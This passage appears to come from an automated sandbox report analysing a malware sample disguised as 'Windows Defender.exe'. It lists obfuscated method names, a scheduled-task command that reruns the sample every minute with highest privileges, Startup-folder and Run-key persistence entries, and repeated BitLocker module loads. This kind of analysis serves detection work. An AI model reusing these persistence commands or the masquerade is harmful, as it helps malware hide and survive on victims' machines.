                      Source: 0.2.Windows Defender.exe.12ea1a78.0.raw.unpack, jx9GZsYLetM8ozl7eeSUYzaQ9rVm6zahKbBJECPrIV9xeRXsM4ZcUAK0g1ype5.csHigh entropy of concatenated method names: 'StyaJjuBncIt9ThkoYTkgJYT4G2PSxngq1OvYXUuUTWkPMCl9dnBCYNLuV56Ae', '_1givnKGlzrQZPv9YZ5KOBN', 'FXCw5u2JpZHzFj705RvUW0', 'ZjqJdWqvnSaB93WE34qu6a', 'wksOBjUK8cAPfmooAuQO2D'
                      Source: 0.2.Windows Defender.exe.12ea1a78.0.raw.unpack, lSDAsIDH8m4Ei0iUo0fhSru3ByZItL2R1ZzgGlHTbgQng9oKNN87cEIG3jW4hf.csHigh entropy of concatenated method names: 'DAd6MY6WE4amuhxrr4rf7HcKOjmPHzihO08yso7tjrHGipjdfQJGte2kNfYt1A', 'EEG2usG8WiBmb3SmuxCcnsQ3osy3y3GDWYkPji0Al1v1JWS0sQRz09IittLfuX', 'QcKEpexPmpox3XOwz4Bl7riUjiPtDwWUxZWYZQtYskm3cKI0ruZMF5g8k670ow', 'WZ7ktBjfrsh68udUUPkZrVhR4WMHREcWaGCfr20GIw65JCQmUgxeG5HrXJmZkf', 'eORZ7fjqhZzG3pzpIn4alL1aoCtIhWEKGQF2JVYzoSGJgi5OzYLKqqSJ1HmMG7', '_553psPh1t5SncNT6ckbKASBJC8uq3fDBHTJIabfU3j1zKoozq4Ci7UzzSCmJtI', 'SyFv2P5XoehdJnT219CeBvc978z1Ho9JrjfROxl1zcFauUtGBjZQ1P8EaFitC0', 'HJO9Xmz1UIQBlQ0JBoV3uUz1irYdtjXjyH0WW2hMdPtDQWgMpG6xP3YF0EoIsD', 'mWcZIDE7MfG3T6MrBrPQiHWeMnLjdXzRv8PqZkTfI3o1E85R1ZFEtHbb8QiUL4', 'hXogqRoM3BqP35AogVfb4qDe4JHRqCjxysRympSYAy0C5Saj7YkhHXjHU0FZYg'
                      Source: 0.2.Windows Defender.exe.12ea1a78.0.raw.unpack, WqBFPPAGdP3qekKnUXbSbMnJQkYEWq6EDn6c9pYZqk7IrAascLDqgnmAgB4ND2.csHigh entropy of concatenated method names: '_2YF2CRCsDxdnPdsPBchoEhwDZKc2AXV8hIOv01TvH6OQlY4T1VOIp7Tkpf2sST', 'izfsM6M5EJ9022yy2GhiMa4Bwnc097KT7AhqxNHBKX7zq8jK6gCmwgw3KdQKda', 'Ux2rE57wFUIxDfwqfnBFCGFSB0GjwBtVP29hwIjLDU1S9quzDBNA22Lay2S0JK', '_43Lx3rAdBh2j4nWOx656HHtCbrZ1PdRnus0reiTUGQoGpicRD8iPa9pXSiZJOc', 'Z13RptwCW6XMeTAkZkkKdm9kNxgi9iKJlLM8IF79bjsu2BhrUZT1siGtlJ4BwO', '_6Q2P9IWxjqddZPGIaZe7mUWnyZmJKvHhjKz91sMVMlcYij9rq4vXtUogf7WrHl', 'X68ePNrQwDbQ8uqQNDHJSitBmeJXe2Q49tAB0TGy72VGUASLGdoz4QZzKHzrgS', '_4VLeHC1i6LkyVH2oQRjg5pHqg89lv7hXZdrnn3ceAR7VmVTgNPZTSsprslXefR', 'nm0e3gZXlCPxo4CZhSxRNAuslaHN5n2q5GASCv78CCyarQHpdJprQ9neptRq0e', 'Vmyuxdcefk6376V9aadd6WNzN74pa5hWPfAoVWk8dTKIrHIFiZGcxW4mxtNlkc'
                      Source: 0.2.Windows Defender.exe.12ea1a78.0.raw.unpack, PhdSKSjN5lWl2CjyeILdY5jzMVuS5YkIGYuKXV2ib8uKrmCC1o0oLoxqW8QtPsNXXPV4wrpR9iXmR.csHigh entropy of concatenated method names: 'JoRZgwYRrib0pzhpbwWuCtzXsDVKwaWx5tO0u2n7d2Cz2N5q28xKD8Fwiqx4STiG0XvtWrH2LhOU1', 'btLAU14pks6PBxFwEe0mhymuEFOGtv1mHvL8Z1lwxNp1uuoqscXUIuXCJMntdvB7QJ4SrgXOqP2Ac', 'ugnFlO8xTqB6vzX4WBwVisSRqh5O5nGNDs3hF8G8QzWX8KfWJpJ6ZFoFuLNjzXlAL7ehRPDMozBR1', 'b7N61fbBnHn379Cg8KG40J7wXB15pCeuevw12h2z463IzZDO9oFoHQcxWRzgKeg6Sj8hhRpGhSOaK', 'KElHQzROcJDUxi5j7UiI8pcLCBOq32DagRpElG4rBN4kpdWNsJamX8yMLUkIqoTrKuS2oYHzR29fo', 'zJENyi6rDFsfvR2PuqsNpRvB0DB3RMi6deOtdOSMdhaBI7Iwv18yYOQSgB3RrlSmWhJHq0PDGfQem', 'enY8qBECWHWHiOg0sJlf5zeZ6a6HQ7dtubz2ewvOScb8ZuTBjUEMAMVrwY29V6ThmbdmOlKDjip5V', 'ndjhIoTbd7FTL4aAH7NOjBb6yoQNNVPtuVkyYeqawMbmsbxyqaY7WBC8lEQ8sWtPZROnieYwkS8CT', '_7qlab1dNPzWfuJE6nU9nYteKoAIV5Hl3bR2emlAtQmjm4Q33fpzxH7Vob9GFwcoBiQsdKh7FcPx7r', 'om2e3sWjhmFSXj6ueB3p2lrHh3loqJI3Ln3FYvLU8zxsAizAWP1FAwqU5fQLtWJ1Fp4gz7atHLzFy'
                      Source: 0.2.Windows Defender.exe.12ea1a78.0.raw.unpack, Q5rYqmkFrCyjhTqjwG8qAWrGPcnIHyXyeJNHX3ZoPPK3S367NSagfidADR3o0oG7aigItouSGKdHm.csHigh entropy of concatenated method names: '_36Iu8s60bxeFR4yMJVHnKU3HH5G0XdCkYGRvNxeusm2xRkTCirth7MIl3bEYMLRwcgVbXbYXWzRJj', 'faomJDQTH9JfrQdsdIlJKfaYbhf3qszNtTnzmUj4976tVVM5Y09H9aNvYFx3TnCXKgLYGVS0lMNLU', 'rkDeZ2n9YEpjTXkJxDoMHTqWF5YQd0ylDMfuTpp5s3RqbkwPhJeNuKgSA415fXhpW68YBHy6Ymcge', 'bHYmEjJ7sdLajo2keOL4u3oa4NrZ9hWJZht8YVkxC2ecvLJErDhtjiRJpCyxpalQXR3elrvDqcgLe', 'ln6UL6yiXM4T1Pr6d3btbvrjL9SoiNilXgU9dDYgetX8ow3FRkWwlwOEaLaToOsql87Je9Y4zZPkt', 'dqW1HlDiGOIQY2sX2VquBfHHMmw6Iu3xtqqcvf3AoUZDJwuOrWVbqgy1qwESKzJ2lJZ3aU0tw6J6C', 'no09akK38j3bIvQNA4Wdv7ufwBUbJ93yyNZghYNkS4ACJlXfxQjAzpXfgczhJ5ArkYZ6gwbvXjSNB', 'EBzFOEVL98ZjzRwTm8lKAdFIiSXYqMGmzGaBjdj0VkZIpSt5tG7a3tBb7LUAIMT7ainpEqxxZMwJ0', '_6EjaJhzY4Gaveg0ui8NYtJg97g738DxWHUEsjKOSVPIJNkk7ze8aJ00bLYqNIMYIkiaqs2WYsOwPU', '_5bUJBXaOgvlMv64mzSubcFb8PqbAGAT8inlazolutMv5ocpXlyla3VzKWXSfp1pZCpEzynoqnlhjb'
                      Source: 0.2.Windows Defender.exe.12ea1a78.0.raw.unpack, Xp5eWsWWhMglmS4zYSIjSD4w2EFmG57IhPNnHU1bP52sr.csHigh entropy of concatenated method names: 'WwjisSxxDCIbYcd4Y4UsqmXSlLzy6oLoIqOCTMWAInrkF', 'bBheXXcZoHVHxH3bBwr4aiknrJ30F2bql9MOkfWOgWaTq', 'Zdz9Y1bCXi8V72fSYkM8d7sniuRdX542x8pAEt3CeMF9j', 'yXMXIg1VptpW8byLQs5HSkP1TA0h1hAEQiHbQSes2bmcp', 'I2YmHmS08pAbFmzOSBH8Y9cTmI9CWatYj4soluOsJsGYz', 'LVuZSiiDv5SFtOV7OLqTzSGpKYqkYtH4XZd8ll22xBt6P', 'D6tgcK1HEP2IGjUVuhog1CaWcVSXFyYs8oDUuBWgoKCPK', '_32gxo0e19sbzb3vOpQ77zPrQGLg0R87ydpGd041Mfbvm8', 'WZylfD2CEeMMaIvgBNUQv7gc2RbHrrLbHNWRRmPYb6aSw', 'lZyYSscCiEU4lOIVItSVV7ZuAnLoEt96sL8470xdo95Jf'
                      Source: 0.2.Windows Defender.exe.12ea1a78.0.raw.unpack, tBZCWm7wJKWrvEwJjCneXQvYCf0Z1Hh9jgOBkQZCmW6wv8woLGoDUWwpaSbAug.csHigh entropy of concatenated method names: 'uAIdma4NR8QqGZMhHTp2pkwIUASRT1s5TCCMoALNGGqZUcAQgjPmEfsnMYfpcU', 'E8guj0wkTXSDi5PFQB7VFk', '_2BlW37vOQ5lBjwqupApYeu', 'O3m6VbhYCCdK6SVfSdZECU', '_46xAuc1Pk0nvKAyw2iwSns'
                      Source: C:\Users\user\Desktop\Windows Defender.exeFile created: C:\Users\user\AppData\Local\Windows Defender.exeJump to dropped file

                      Boot Survival

                      barindex
                      Uses schtasks.exe or at.exe to add and modify task schedules
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Defender" /tr "C:\Users\user\AppData\Local\Windows Defender.exe"
                      Source: C:\Users\user\Desktop\Windows Defender.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Defender.lnkJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Defender.lnkJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows DefenderJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows DefenderJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Loading BitLocker PowerShell Module
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
